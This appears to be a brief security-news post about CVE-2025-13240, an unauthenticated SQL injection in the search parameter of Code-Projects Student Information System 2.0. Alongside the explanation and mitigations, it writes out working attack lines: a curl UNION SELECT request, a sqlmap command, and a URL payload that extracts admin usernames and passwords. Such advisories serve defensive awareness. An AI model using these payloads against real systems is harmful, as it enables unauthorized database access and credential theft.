Listen to this Post
How the mentioned CVE works:
The vulnerability CVE-2025-13240 is an unauthenticated SQL injection in the Code-Projects Student Information System version 2.0. It exists within the `searchquery.php` file, specifically in the `s` parameter. When a user submits a search request, the input passed to the `s` parameter is not properly sanitized before being incorporated into an SQL query. This allows a remote attacker to send crafted malicious SQL code, such as a UNION SELECT statement, directly through this parameter. Because the application does not use prepared statements and fails to escape user input, the malicious payload is executed by the backend database. This enables an attacker to read, modify, or delete sensitive information from the database, including student records and administrative credentials, without any form of authentication.
Platform: Code-Projects SIS
Version: 2.0
Vulnerability: SQL Injection
Severity: Medium
date: 11/16/2025
Prediction: Patch expected 12/20/2025
What Undercode Say:
`curl -s “http://target.com/searchquery.php?s=’ UNION SELECT 1,user(),3,4– -“`
`sqlmap -u “http://target.com/searchquery.php?s=test” –batch –dbs`
How Exploit:
`http://victim-system.com/searchquery.php?s=’ UNION SELECT 1,username,password,4 FROM admin_users– -`
Protection from this CVE:
Parameterized queries.
Input sanitization.
Web Application Firewall.
Impact:
Database compromise.
Data theft.
Unauthenticated access.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
